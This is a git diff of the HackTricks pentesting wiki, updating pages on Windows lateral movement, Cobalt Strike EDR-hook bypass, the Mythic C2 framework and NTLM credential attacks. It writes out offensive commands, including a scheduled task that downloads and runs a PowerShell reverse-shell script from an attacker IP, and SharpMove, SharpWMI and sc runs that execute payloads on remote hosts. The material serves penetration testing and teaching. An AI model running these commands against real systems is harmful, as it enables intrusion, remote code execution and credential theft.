@ -224,8 +331,17 @@ Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
#### Function hooks | Syscall
Function hooking is a very common method of ERDs to detect malicious activity. Cobalt Strike allows you to bypass these hooks by using **syscalls** instead of the standard Windows API calls using the **`None`** config, or use the `Nt*` version of a function with the **`Direct`** setting, or just jumping over the `Nt*` function with the **`Indirect`** option in the malleable profile. Depending on the system, an optino might be more stealth then the other.
This can be set in the profile or suing the command **`syscall-method`**
However, this could also be noisy.
Some option granted by Cobalt Strike to bypass function hooks is to remove those hooks with: [**unhook-bof**](https://github.com/Cobalt-Strike/unhook-bof).
You could also check with functions are hooked with [**https://github.com/Mr-Un1k0d3r/EDRs**](https://github.com/Mr-Un1k0d3r/EDRs) or [**https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector**](https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector)

2
src/windows-hardening/lateral-movement/README.md
View File

@ -10,6 +10,8 @@ There are different different ways to execute commands in external systems, here
- [**AtExec / SchtasksExec**](atexec.md)
- [**WinRM**](winrm.md)
- [**DCOM Exec**](dcom-exec.md)
- [**RDPexec**](rdpexec.md)
- [**SCMexec**](scmexec.md)
- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud)
- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud)
- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud)

12
src/windows-hardening/lateral-movement/atexec.md
View File

@ -22,12 +22,24 @@ schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
```
You can use **Impacket's `atexec.py`** to execute commands on remote systems using the AT command. This requires valid credentials (username and password or hash) for the target system.
```bash
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
```
You can also use [SharpLateral](https://github.com/mertdas/SharpLateral):
```bash
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
```
You can use [SharpMove](https://github.com/0xthirteen/SharpMove):
```bash
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
```
More information about the [**use of schtasks with silver tickets here**](../active-directory-methodology/silver-ticket.md#host).
{{#include ../../banners/hacktricks-training.md}}

33
src/windows-hardening/lateral-movement/dcom-exec.md → src/windows-hardening/lateral-movement/dcomexec.md
View File

@ -16,7 +16,7 @@ The COM object, [MMC Application Class (MMC20.Application)](https://technet.micr
This feature facilitates the execution of commands over a network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be utilized as follows:
```powershell
```bash
[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
```
@ -24,14 +24,14 @@ This command connects to the DCOM application and returns an instance of the COM
Check methods:
```powershell
```bash
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member
```
Get RCE:
```powershell
```bash
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member
@ -54,11 +54,16 @@ For `ShellWindows`, which lacks a ProgID, the .NET methods `Type.GetTypeFromCLSI
Example PowerShell commands were provided to instantiate the object and execute commands remotely:
```powershell
```bash
# Example
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
# Need to upload the file to execute
$COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION", "192.168.52.100"))
$COM.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe", $Null, $Null, "7")
```
### Lateral Movement with Excel DCOM Objects
@ -67,7 +72,7 @@ Lateral movement can be achieved by exploiting DCOM Excel objects. For detailed
The Empire project provides a PowerShell script, which demonstrates the utilization of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available on [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1), showcasing different methods to abuse Excel for RCE:
```powershell
```bash
# Detection of Office version
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
@ -102,15 +107,33 @@ Two tools are highlighted for automating these techniques:
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
- [SharpMove](https://github.com/0xthirteen/SharpMove):
```bash
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
```
## Automatic Tools
- The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) allows to easily invoke all the commented ways to execute code in other machines.
- You can use Impacket's `dcomexec.py` to execute commands on remote systems using DCOM.
```bash
dcomexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' "cmd.exe /c whoami"
```
- You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
- You could also use [**SharpMove**](https://github.com/0xthirteen/SharpMove)
```bash
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
```
## References
- [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)

25
src/windows-hardening/lateral-movement/psexec-and-winexec.md
View File

@ -1,4 +1,4 @@
# PsExec/Winexec/ScExec
# PsExec/Winexec/ScExec/SMBExec
{{#include ../../banners/hacktricks-training.md}}
@ -16,6 +16,7 @@ The process is outlined in the steps below, illustrating how service binaries ar
Assuming there is an executable payload (created with msfvenom and obfuscated using Veil to evade antivirus detection), named 'met8888.exe', representing a meterpreter reverse_http payload, the following steps are taken:
- **Copying the binary**: The executable is copied to the ADMIN$ share from a command prompt, though it may be placed anywhere on the filesystem to remain concealed.
- Instead of copying the binary it's also possible to use a LOLBAS binary like `powershell.exe` or `cmd.exe` to execute commands directly from the arguments. E.g. `sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"`
- **Creating a service**: Utilizing the Windows `sc` command, which allows for querying, creating, and deleting Windows services remotely, a service named "meterpreter" is created to point to the uploaded binary.
- **Starting the service**: The final step involves starting the service, which will likely result in a "time-out" error due to the binary not being a genuine service binary and failing to return the expected response code. This error is inconsequential as the primary goal is the binary's execution.
@ -25,17 +26,31 @@ Observation of the Metasploit listener will reveal that the session has been ini
Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
**You could also use the Windows Sysinternals binary PsExec.exe:**
- You could also use the **Windows Sysinternals binary PsExec.exe**:
![](<../../images/image (928).png>)
You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
Or access it via webddav:
```bash
\\live.sysinternals.com\tools\PsExec64.exe -accepteula
```
- You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
```bash
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
```
- You could also use [**SharpMove**](https://github.com/0xthirteen/SharpMove):
```bash
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService
```
- You could also use **Impacket's `psexec` and `smbexec.py`**.
{{#include ../../banners/hacktricks-training.md}}

18
src/windows-hardening/lateral-movement/rdpexec.md Normal file
View File

@ -0,0 +1,18 @@
# RDPexec
{{#include ../../banners/hacktricks-training.md}}
## How it Works
**RDPexec** is basically to execute commands login into the system using RDP.
For more information check:
{{#ref}}
../../network-services-pentesting/pentesting-rdp.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

15
src/windows-hardening/lateral-movement/scmexec.md Normal file
View File

@ -0,0 +1,15 @@
# DCOM Exec
{{#include ../../banners/hacktricks-training.md}}
## SCM
**SCMExec** is a technique to execute commands on remote systems using the Service Control Manager (SCM) to create a service that runs the command. This method can bypass some security controls, such as User Account Control (UAC) and Windows Defender.
## Tools
- [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
{{#include ../../banners/hacktricks-training.md}}

45
src/windows-hardening/lateral-movement/smbexec.md
View File

@ -1,45 +0,0 @@
# SmbExec/ScExec
{{#include ../../banners/hacktricks-training.md}}
## How it Works
**Smbexec** is a tool used for remote command execution on Windows systems, similar to **Psexec**, but it avoids placing any malicious files on the target system.
### Key Points about **SMBExec**
- It operates by creating a temporary service (for example, "BTOBTO") on the target machine to execute commands via cmd.exe (%COMSPEC%), without dropping any binaries.
- Despite its stealthy approach, it does generate event logs for each command executed, offering a form of non-interactive "shell".
- The command to connect using **Smbexec** looks like this:
```bash
smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
```
### Executing Commands Without Binaries
- **Smbexec** enables direct command execution through service binPaths, eliminating the need for physical binaries on the target.
- This method is useful for executing one-time commands on a Windows target. For instance, pairing it with Metasploit's `web_delivery` module allows for the execution of a PowerShell-targeted reverse Meterpreter payload.
- By creating a remote service on the attacker's machine with binPath set to run the provided command through cmd.exe, it's possible to execute the payload successfully, achieving callback and payload execution with the Metasploit listener, even if service response errors occur.
### Commands Example
Creating and starting the service can be accomplished with the following commands:
```bash
sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
sc start [ServiceName]
```
FOr further details check [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
## References
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
{{#include ../../banners/hacktricks-training.md}}

28
src/windows-hardening/lateral-movement/wmiexec.md
View File

@ -115,10 +115,6 @@ wmic /node:hostname /user:user path win32_process call create "empire launcher s
This process illustrates WMI's capability for remote execution and system enumeration, highlighting its utility for both system administration and penetration testing.
## References
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
## Automatic Tools
- [**SharpLateral**](https://github.com/mertdas/SharpLateral):
@ -127,6 +123,30 @@ This process illustrates WMI's capability for remote execution and system enumer
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
```
- [**SharpWMI**](https://github.com/GhostPack/SharpWMI)
```bash
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true]
# Stealthier execution with VBS
SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
```
- [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):
```bash
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
```
- You could also use **Impacket's `wmiexec`**.
## References
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
{{#include ../../banners/hacktricks-training.md}}

176
src/windows-hardening/mythic.md Normal file
View File

@ -0,0 +1,176 @@
# Mythic
## What is Mythic?
Mythic is an open-source, modular command and control (C2) framework designed for red teaming . It allows security professionals to manage and deploy various agents (payloads) across different operating systems, including Windows, Linux, and macOS. Mythic provides a user-friendly web interface for managing agents, executing commands, and collecting results, making it a powerful tool for simulating real-world attacks in a controlled environment.
### Installation
To install Mythic, follow the instructions on the official **[Mythic repo](https://github.com/its-a-feature/Mythic)**.
### Agents
Mythic supports multiple agents, which are the **payloads that perform tasks on the compromised systems**. Each agent can be tailored to specific needs and can run on different operating systems.
By default Mythic doesn't have any agents installed. However, it offers some open source agent in [**https://github.com/MythicAgents**](https://github.com/MythicAgents).
To install an agent from that repo you just need to run:
```bash
sudo ./mythic-cli install github https://github.com/MythicAgents/<agent-name>
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell
```
You can add new agents with the previous command even if Mythic is already running.
### C2 Profiles
C2 profiles in Mythic define **how agents communicate with the Mythic server**. They specify the communication protocol, encryption methods, and other settings. You can create and manage C2 profiles through the Mythic web interface.
By default Mythic is installed with no profiles, however, it's possible to download some profiles from the repo [**https://github.com/MythicC2Profiles**](https://github.com/MythicC2Profiles) running:
```bash
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/<c2-profile>>
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
```
## [Apollo Agent](https://github.com/MythicAgents/Apollo)
Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.
Install it with:
```bash
./mythic-cli install github https://github.com/MythicAgents/Apollo.git
```
This agent has a lot of commands that makes it very similar to Cobalt Strike's Beacon with some extras. Among them, it supports:
### Common actions
- `cat`: Print the contents of a file
- `cd`: Change the current working directory
- `cp`: Copy a file from one location to another
- `ls`: List files and directories in the current directory or specified path
- `pwd`: Print the current working directory
- `ps`: List running processes on the target system (with added info)
- `download`: Download a file from the target system to the local machine
- `upload`: Upload a file from the local machine to the target system
- `reg_query`: Query registry keys and values on the target system
- `reg_write_value`: Write a new value to a specified registry key
- `sleep`: Change the agent's sleep interval, which determines how often it checks in with the Mythic server
- And may others, use `help` to see the full list of available commands.
### Privilege escalation
- `getprivs`: Enable as many privileges as possible on the current thread token
- `getsystem`: Open a handle to winlogon and duplicate the token, effectively escalating privileges to SYSTEM level
- `make_token`: Create a new logon session and apply it to the agent, allowing for impersonation of another user
- `steal_token`: Steal a primary token from another process, allowing the agent to impersonate that process's user
- `pth`: Pass-the-Hash attack, allowing the agent to authenticate as a user using their NTLM hash without needing the plaintext password
- `mimikatz`: Run Mimikatz commands to extract credentials, hashes, and other sensitive information from memory or the SAM database
- `rev2self`: Revert the agent's token to its primary token, effectively dropping privileges back to the original level
- `ppid`: Change the parent process for post-exploitation jobs by specifying a new parent process ID, allowing for better control over job execution context
- `printspoofer`: Execute PrintSpoofer commands to bypass print spooler security measures, allowing for privilege escalation or code execution
- `dcsync`: Sync a user's Kerberos keys to the local machine, allowing for offline password cracking or further attacks
- `ticket_cache_add`: Add a Kerberos ticket to the current logon session or a specified one, allowing for ticket reuse or impersonation
### Process execution
- `assembly_inject`: Allows to inject a .NET assembly loader into a remote process
- `execute_assembly`: Executes a .NET assembly in the context of the agent
- `execute_coff`: Executes a COFF file in memory, allowing for in-memory execution of compiled code
- `execute_pe`: Executes an unmanaged executable (PE)
- `inline_assembly`: Executes a .NET assembly in a disposable AppDomain, allowing for temporary execution of code without affecting the agent's main process
- `run`: Executes a binary on the target system, using the system's PATH to find the executable
- `shinject`: Injects shellcode into a remote process, allowing for in-memory execution of arbitrary code
- `inject`: Injects agent shellcode into a remote process, allowing for in-memory execution of the agent's code
- `spawn`: Spawns a new agent session in the specified executable, allowing for the execution of shellcode in a new process
- `spawnto_x64` and `spawnto_x86`: Change the default binary used in post-exploitation jobs to a specified path instead of using `rundll32.exe` without params which is very noisy.
### Mithic Forge
This allows to **load COFF/BOF** files from the Mythic Forge, which is a repository of pre-compiled payloads and tools that can be executed on the target system. With all the commands that can be loaded it'll be possible to perform common actions executing them in the current agent process as BOFs (more steath usually).
Start installing them with:
```bash
./mythic-cli install github https://github.com/MythicAgents/forge.git
```
Then, use `forge_collections` to show the a COFF/BOF modules from the Mythic Forge to be able to select and load them into the agent's memory for execution. By default, the following 2 collections are added in Apollo:
- `forge_collections {"collectionName":"SharpCollection"}`
- `forge_collections {"collectionName":"SliverArmory"}`
After one module is loaded, it'll appear in the list as another command like `forge_bof_sa-whoami` or `forge_bof_sa-netuser`.
### Powershell & scripting execution
- `powershell_import`: Imports a new PowerShell script (.ps1) into the agent cache for later execution
- `powershell`: Executes a PowerShell command in the context of the agent, allowing for advanced scripting and automation
- `powerpick`: Injects a PowerShell loader assembly into a sacrificial process and executes a PowerShell command (without powershell logging).
- `psinject`: Executes PowerShell in a specified process, allowing for targeted execution of scripts in the context of another process
- `shell`: Executes a shell command in the context of the agent, similar to running a command in cmd.exe
### Lateral Movement
- `jump_psexec`: Uses the PsExec technique to move laterally to a new host by first copying over the Apollo agent executable (apollo.exe) and executing it.
- `jump_wmi`: Uses the WMI technique to move laterally to a new host by first copying over the Apollo agent executable (apollo.exe) and executing it.
- `wmiexecute`: Executes a command on the local or specified remote system using WMI, with optional credentials for impersonation.
- `net_dclist`: Retrieves a list of domain controllers for the specified domain, useful for identifying potential targets for lateral movement.
- `net_localgroup`: Lists local groups on the specified computer, defaulting to localhost if no computer is specified.
- `net_localgroup_member`: Retrieves local group membership for a specified group on the local or remote computer, allowing for enumeration of users in specific groups.
- `net_shares`: Lists remote shares and their accessibility on the specified computer, useful for identifying potential targets for lateral movement.
- `socks`: Enables a SOCKS 5 compliant proxy on the target network, allowing for tunneling of traffic through the compromised host. Compatible with tools like proxychains.
- `rpfwd`: Starts listening on a specified port on the target host and forwards traffic through Mythic to a remote IP and port, allowing for remote access to services on the target network.
- `listpipes`: Lists all named pipes on the local system, which can be useful for lateral movement or privilege escalation by interacting with IPC mechanisms.
### Miscellaneous Commands
- `help`: Displays detailed information about specific commands or general information about all available commands in the agent.
- `clear`: Marks tasks as 'cleared' so they can't be picked up by agents. You can specify `all` to clear all tasks or `task Num` to clear a specific task.
## [Poseidon Agent](https://github.com/MythicAgents/Poseidon)
Poseidon is a Golang agent that compiles into **Linux and macOS** executables.
```bash
./mythic-cli install github https://github.com/MythicAgents/Poseidon.git
```
When user over linux it has some interesting commands:
### Common actions
- `cat`: Print the contents of a file
- `cd`: Change the current working directory
- `chmod`: Change the permissions of a file
- `config`: View current config and host information
- `cp`: Copy a file from one location to another
- `curl`: Execute a single web request with optional headers and method
- `upload`: Upload a file to the target
- `download`: Download a file from the target system to the local machine
- And many more
### Search Sensitive Information
- `triagedirectory`: Find interesting files within a directory on a host, such as sensitive files or credentials.
- `getenv`: Get all of the current environment variables.
### Move laterally
- `ssh`: SSH to host using the designated credentials and open a PTY without spawning ssh.
- `sshauth`: SSH to specified host(s) using the designated credentials. You can also use this to execute a specific command on the remote hosts via SSH or use it to SCP files.
- `link_tcp`: Link to another agent over TCP, allowing for direct communication between agents.
- `link_webshell`: Link to an agent using the webshell P2P profile, allowing for remote access to the agent's web interface.
- `rpfwd`: Start or Stop a Reverse Port Forward, allowing for remote access to services on the target network.
- `socks`: Start or Stop a SOCKS5 proxy on the target network, allowing for tunneling of traffic through the compromised host. Compatible with tools like proxychains.
- `portscan`: Scan host(s) for open ports, useful for identifying potential targets for lateral movement or further attacks.
### Process execution
- `shell`: Execute a single shell command via /bin/sh, allowing for direct execution of commands on the target system.
- `run`: Execute a command from disk with arguments, allowing for the execution of binaries or scripts on the target system.
- `pty`: Open up an interactive PTY, allowing for direct interaction with the shell on the target system.

14
src/windows-hardening/ntlm/README.md
View File

@ -82,7 +82,7 @@ The **hash NT (16bytes)** is divided in **3 parts of 7bytes each** (7B + 7B + (2
Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't **abuse a Print Spooler service** configured.
You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.\
If you are using `responder` you could try to \*\*use the flag `--lm` \*\* to try to **downgrade** the **authentication**.\
If you are using `responder` you could try to **use the flag `--lm`** to try to **downgrade** the **authentication**.\
_Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).
@ -272,6 +272,18 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
**For more information about** [**how to obtain credentials from a Windows host you should read this page**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.**
## Internal Monologue attack
The Internal Monologue Attack is a stealthy credential extraction technique that allows an attacker to retrieve NTLM hashes from a victim's machine **without interacting directly with the LSASS process**. Unlike Mimikatz, which reads hashes directly from memory and is frequently blocked by endpoint security solutions or Credential Guard, this attack leverages **local calls to the NTLM authentication package (MSV1_0) via the Security Support Provider Interface (SSPI)**. The attacker first **downgrades NTLM settings** (e.g., LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) to ensure that NetNTLMv1 is permitted. They then impersonate existing user tokens obtained from running processes and trigger NTLM authentication locally to generate NetNTLMv1 responses using a known challenge.
After capturing these NetNTLMv1 responses, the attacker can quickly recover the original NTLM hashes using **precomputed rainbow tables**, enabling further Pass-the-Hash attacks for lateral movement. Crucially, the Internal Monologue Attack remains stealthy because it doesn't generate network traffic, inject code, or trigger direct memory dumps, making it harder for defenders to detect compared to traditional methods like Mimikatz.
If NetNTLMv1 is not accepted—due to enforced security policies, then the attacker may fail to retrieve a NetNTLMv1 response.
To handle this case, the Internal Monologue tool was updated: It dynamically acquires a server token using `AcceptSecurityContext()` to still **capture NetNTLMv2 responses** if NetNTLMv1 fails. While NetNTLMv2 is much harder to crack, it still opens a path for relay attacks or offline brute-force in limited cases.
The PoC can be found in **[https://github.com/eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue)**.
## NTLM Relay and Responder
**Read more detailed guide on how to perform those attacks here:**

36
src/windows-hardening/ntlm/atexec.md
View File

@ -1,36 +0,0 @@
# AtExec / SchtasksExec
{{#include ../../banners/hacktricks-training.md}}
## How Does it works
At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.
```
At \\victim 11:00:00PM shutdown -r
```
Using schtasks you need first to create the task and then call it:
```bash
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
```
```bash
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
```
You can also use [SharpLateral](https://github.com/mertdas/SharpLateral):
```bash
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
```
More information about the [**use of schtasks with silver tickets here**](../active-directory-methodology/silver-ticket.md#host).
{{#include ../../banners/hacktricks-training.md}}

4
src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
View File

@ -2,8 +2,8 @@
{{#include ../../banners/hacktricks-training.md}}
**Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)**
from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md
**Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
{{#include ../../banners/hacktricks-training.md}}

43
src/windows-hardening/ntlm/psexec-and-winexec.md
View File

@ -1,43 +0,0 @@
# PsExec/Winexec/ScExec
{{#include ../../banners/hacktricks-training.md}}
## How do they work
The process is outlined in the steps below, illustrating how service binaries are manipulated to achieve remote execution on a target machine via SMB:
1. **Copying of a service binary to the ADMIN$ share over SMB** is performed.
2. **Creation of a service on the remote machine** is done by pointing to the binary.
3. The service is **started remotely**.
4. Upon exit, the service is **stopped, and the binary is deleted**.
### **Process of Manually Executing PsExec**
Assuming there is an executable payload (created with msfvenom and obfuscated using Veil to evade antivirus detection), named 'met8888.exe', representing a meterpreter reverse_http payload, the following steps are taken:
- **Copying the binary**: The executable is copied to the ADMIN$ share from a command prompt, though it may be placed anywhere on the filesystem to remain concealed.
- **Creating a service**: Utilizing the Windows `sc` command, which allows for querying, creating, and deleting Windows services remotely, a service named "meterpreter" is created to point to the uploaded binary.
- **Starting the service**: The final step involves starting the service, which will likely result in a "time-out" error due to the binary not being a genuine service binary and failing to return the expected response code. This error is inconsequential as the primary goal is the binary's execution.
Observation of the Metasploit listener will reveal that the session has been initiated successfully.
[Learn more about the `sc` command](https://technet.microsoft.com/en-us/library/bb490995.aspx).
Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
**You could also use the Windows Sysinternals binary PsExec.exe:**
![](<../../images/image (165).png>)
You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
```
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
```
{{#include ../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More